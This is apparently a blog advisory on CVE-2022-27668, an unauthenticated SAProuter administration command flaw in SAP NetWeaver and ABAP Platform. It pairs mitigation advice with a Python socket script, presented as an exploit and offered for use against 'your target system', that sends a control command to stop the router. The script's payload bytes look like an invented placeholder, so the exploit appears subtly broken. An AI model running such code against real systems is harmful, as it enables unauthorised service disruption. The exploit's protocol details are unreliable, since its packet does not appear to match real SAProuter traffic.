CVE-2022-27668: Unauthenticated Remote SAProuter Administration Command Execution in SAP NetWeaver and ABAP Platform

In this long read post, we will discuss the details of the CVE-2022-27668 vulnerability found in multiple versions of the SAP NetWeaver and ABAP Platform systems. This exploit allows an unauthenticated attacker to execute SAProuter administration commands from a remote client, which could highly impact system availability and lead to service disruptions.

Exploit Details

This vulnerability exists due to the improper configuration of the route permission table (saprouttab file) which governs access control of the SAProuter administrative commands. A remote unauthenticated attacker can exploit this vulnerability by connecting to the SAProuter and issuing administration commands, such as stopping the SAProuter, which could lead to a denial of service (DoS) condition.

Below is an example of a Python code snippet demonstrating the exploitation of this vulnerability

import socket

TARGET_IP = "192.168.1.10"
TARGET_PORT = 3299
SAPROUTER_CONTROL_COMMAND = b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 R CMD XXX"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((TARGET_IP, TARGET_PORT))

# Sending the SAProuter administration command (e.g., stopping the SAProuter)
sock.send(SAPROUTER_CONTROL_COMMAND)
response = sock.recv(1024)

# Print the server response
print("Server response:", response)
sock.close()

Replace the TARGET_IP, TARGET_PORT, and SAPROUTER_CONTROL_COMMAND variables with the appropriate values for your target system and desired command.

For more details about this vulnerability, you can refer to the following sources

1. The original CVE entry: CVE-2022-27668
2. SAP Security Note: 3014107

To mitigate this vulnerability, SAP has provided the following recommendations

1. Update the affected SAP software components to the latest available patch levels, as described in SAP Security Note 3014107.
2. Ensure that the saprouttab file has a secure and correct configuration by following SAP's guidelines, such as allowing only trusted IP addresses and explicitly denying access to all others.
3. Implement proper network segmentation and make sure that the SAProuter is not directly exposed to untrusted networks (e.g., the Internet).

In conclusion, CVE-2022-27668 presents a significant risk to SAP NetWeaver and ABAP Platform systems. It is crucial for organizations running these systems to update their software to patched versions and properly configure their route permission tables to prevent unauthorized remote execution of SAProuter administrative commands.

Timeline

Published on: 06/14/2022 17:15:00 UTC
Last modified on: 06/24/2022 15:46:00 UTC